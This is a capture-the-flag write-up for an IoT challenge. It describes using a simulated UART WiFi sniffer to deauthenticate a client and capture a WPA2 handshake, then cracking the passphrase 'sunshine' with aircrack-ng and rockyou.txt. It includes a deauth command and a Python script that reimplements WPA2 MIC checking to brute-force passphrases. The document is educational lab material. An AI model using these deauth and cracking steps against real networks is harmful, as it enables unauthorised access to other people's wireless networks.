# Cr4cK_W1F1

| Field | Value |
|-------|-------|
| Category | IoT |
| Difficulty | Medium |
| Points | TBD |
| Author | Eun0us |
| CTF | Espilon 2026 |

---

## Description

You recover UART access to a red team WiFi sniffer tool. Analyze the captured data to recover the WiFi password, then connect to the network and retrieve the flag.

- TX (read UART): port 1111
- RX (write UART): port 2222

---

## TL;DR

Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find the passphrase `sunshine`, then connect and read the flag.

---

## Tools

| Tool | Purpose |
|------|---------|
| `nc` | Connect to the UART TX/RX ports |
| `base64` | Decode the PCAP blob |
| `aircrack-ng` | Crack the WPA2 handshake |
| `rockyou.txt` | Password wordlist |

---

## Solution

![hashcat cracking WPA handshake](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_crack.png)

### Step 1 — Open both UART channels

The two UART directions are exposed as two separate TCP ports, so each one gets its own `nc` session (`<host>` is the challenge host):

```bash
# Terminal 1 — TX (read output)
nc <host> 1111

# Terminal 2 — RX (send commands)
nc <host> 2222
```

![two terminals showing TX output and RX prompt](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_terminals.png)

### Step 2 — Start the sniffer and force a deauth

In the RX terminal:

```text
sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop
```

The deauthentication frame kicks the client `02:00:00:aa:00:01` off `TestNet`. When it reconnects it performs the WPA2 4-way handshake again, and the sniffer records the EAPOL messages. The passphrase itself never crosses the air, but the MIC in the handshake is computed with a key derived from the passphrase (via the PMK and PTK), which is what makes an offline dictionary attack on the capture possible.
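The TX stream from the run above carries the capture as base64 between `PCAP_BASE64_BEGIN` and `PCAP_BASE64_END` markers (Step 3 below). Copying those lines by hand from a raw `nc` session is error-prone: UART output carries carriage returns and sniffer status lines that `base64 -d` will reject. The following script is an added example, not part of the original writeup or the challenge tooling; it reads a saved TX log (for instance from `nc <host> 1111 | tee tx.log`), pulls out and decodes the payload, and checks that the result actually starts with a pcap or pcapng magic number before you hand it to `aircrack-ng`. The sample log embedded in it is constructed for the example and is not real challenge output.

```python
import base64
import binascii

# Magic numbers a decoded capture may start with: libpcap in either byte order
# (microsecond and nanosecond variants) and the pcapng section header block.
PCAP_MAGICS = {
    bytes.fromhex("d4c3b2a1"), bytes.fromhex("a1b2c3d4"),
    bytes.fromhex("4d3cb2a1"), bytes.fromhex("a1b23c4d"),
    bytes.fromhex("0a0d0d0a"),
}


def extract_pcap(tx_log: str) -> bytes:
    """Return the decoded bytes found between the two markers in a saved TX stream.

    Every line is stripped first so stray carriage returns and spaces from the
    UART neither break the marker match nor poison the base64 decode.
    """
    lines = [line.strip() for line in tx_log.splitlines()]
    try:
        start = lines.index("PCAP_BASE64_BEGIN")
        end = lines.index("PCAP_BASE64_END", start + 1)
    except ValueError:
        raise ValueError("PCAP markers not found; was `sniffer stop` issued?") from None
    payload = "".join(lines[start + 1:end])
    try:
        # validate=True makes a copied prompt line or status message fail loudly
        # instead of being silently dropped as non-alphabet characters.
        return base64.b64decode(payload, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"payload is not clean base64 ({exc}); check for copied chatter") from None


def looks_like_pcap(data: bytes) -> bool:
    """True when the decoded blob starts with a known pcap/pcapng magic."""
    return data[:4] in PCAP_MAGICS


# Constructed sample TX log (not real challenge output): sniffer chatter with CRLF
# line endings around a 24-byte libpcap global header, linktype 105 (IEEE 802.11).
SAMPLE_TX_LOG = (
    "[sniffer] capturing on channel 6\r\n"
    "[sniffer] stopped, 3 frames buffered\r\n"
    "PCAP_BASE64_BEGIN\r\n"
    "1MOyoQIABAAAAAAAAAAAAP//AABpAAAA\r\n"
    "PCAP_BASE64_END\r\n"
)


def demo(tx_log: str = SAMPLE_TX_LOG) -> bytes:
    """Decode a TX log and refuse anything that is not a capture file."""
    data = extract_pcap(tx_log)
    if not looks_like_pcap(data):
        raise ValueError("decoded data does not start with a pcap/pcapng magic")
    return data


if __name__ == "__main__":
    pcap = demo()
    with open("handshake.pcap", "wb") as fh:
        fh.write(pcap)
    print(f"wrote handshake.pcap ({len(pcap)} bytes)")
```

To use it on the real session, replace `SAMPLE_TX_LOG` with the contents of your saved TX log; the magic check catches the common failure where a marker line or a prompt was copied into the payload and the "pcap" that comes out is garbage.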
### Step 3 — Extract the PCAP from TX

On the TX terminal, the sniffer dumps the capture as base64 between two markers:

```text
PCAP_BASE64_BEGIN
PCAP_BASE64_END
```

Copy the lines between the markers (without the markers themselves) into `handshake.b64` and decode them:

```bash
base64 -d handshake.b64 > handshake.pcap
```

If `base64` reports invalid input, a prompt line or a carriage return from the UART stream was copied along with the payload; strip it and decode again.

![TX output showing the PCAP_BASE64 markers](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_pcap.png)

### Step 4 — Crack the WPA2 handshake

`-b` pins the attack to the `TestNet` BSSID so `aircrack-ng` does not stop to ask which network to target. Running `aircrack-ng handshake.pcap` without a wordlist first is a useful sanity check: it lists the networks seen in the capture and shows `WPA (1 handshake)` next to `TestNet` only if the deauth actually produced a usable handshake.

```bash
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
```

Output:

```text
KEY FOUND! [ sunshine ]
```

![aircrack-ng finding the key](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_aircrack.png)

### Step 5 — Connect and read the flag

In the RX terminal:

```text
connect TestNet sunshine
cat /flag.txt
```

![RX terminal returning the flag after connecting to the network](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/wifi_flag_rx.png)

---

## Flag

`CTF{CR4CK_W1F1_EXAMPLE}`

> Note: This challenge was still being finalized at time of writing. The flag above is
> a placeholder; the real flag will be updated before deployment.
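What `aircrack-ng` does in Step 4, and why the deauth in Step 2 is needed, is easier to see in code than in prose. For each candidate passphrase it derives the PMK with PBKDF2-HMAC-SHA1 over the SSID, expands it into the PTK using both MAC addresses and both nonces, and recomputes the MIC over the captured EAPOL message with the first 16 bytes of the PTK (the KCK); a match means the candidate is the passphrase. The ANonce comes from message 1 and the SNonce and MIC from message 2, which is why the capture must contain at least those two frames. The script below is an added example written for this page, not `aircrack-ng`'s own code or anything from the challenge; it builds a constructed message 2 with a valid MIC for `sunshine` (the nonces, the RSN IE and the replay counter are made up for the example, the addresses and SSID are the ones from the writeup) and then recovers the passphrase from a tiny wordlist.

```python
import hashlib
import hmac
import struct

# SSID and addresses from the writeup: the TestNet BSSID and the deauthed client.
SSID = "TestNet"
AP_MAC = bytes.fromhex("020000100001")
STA_MAC = bytes.fromhex("020000aa0001")

# 4-byte 802.1X header + 77 bytes of EAPOL-Key descriptor fields precede the MIC.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK = first 16 bytes of the PTK from the 802.11 PRF-512 (HMAC-SHA1 counter mode)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (descriptor version 2) MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key message 2 of 4. Key info 0x010a = version 2 (AES, HMAC-SHA1 MIC), pairwise, MIC bit set."""
    body = (
        struct.pack(">BHH", 2, 0x010A, 0)          # descriptor type, key info, key length
        + struct.pack(">Q", 1)                     # replay counter
        + snonce                                   # key nonce (SNonce)
        + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, key RSC, key ID
        + mic
        + struct.pack(">H", len(key_data)) + key_data
    )
    return struct.pack(">BBH", 1, 3, len(body)) + body  # 802.1X: version 1, type 3 (Key), length


def crack(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, or None."""
    captured = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), captured):
            return candidate
    return None


def make_sample_handshake(passphrase: str = "sunshine"):
    """Constructed handshake fields (not from the real capture): fixed nonces, a standard RSN IE, valid MIC."""
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # RSN IE advertising CCMP group/pairwise ciphers and PSK key management.
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    unsigned = build_msg2(snonce, rsn_ie)
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)
    return anonce, snonce, build_msg2(snonce, rsn_ie, eapol_mic(kck, unsigned))


def demo():
    """Recover the passphrase of the constructed handshake from a small wordlist."""
    anonce, snonce, msg2 = make_sample_handshake()
    wordlist = ["password", "123456", "qwerty", "sunshine", "iloveyou"]
    return crack(SSID, AP_MAC, STA_MAC, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("KEY FOUND!", demo())
```

Two details matter for a real capture: the PMK depends on the exact SSID bytes, so a wrong or truncated ESSID in the pcap makes every candidate fail, and a message 2 with descriptor version 1 (TKIP) uses HMAC-MD5 for the MIC instead of HMAC-SHA1. The 4096-iteration PBKDF2 per candidate is the whole cost of the attack, which is why GPU crackers and precomputed PMK tables exist.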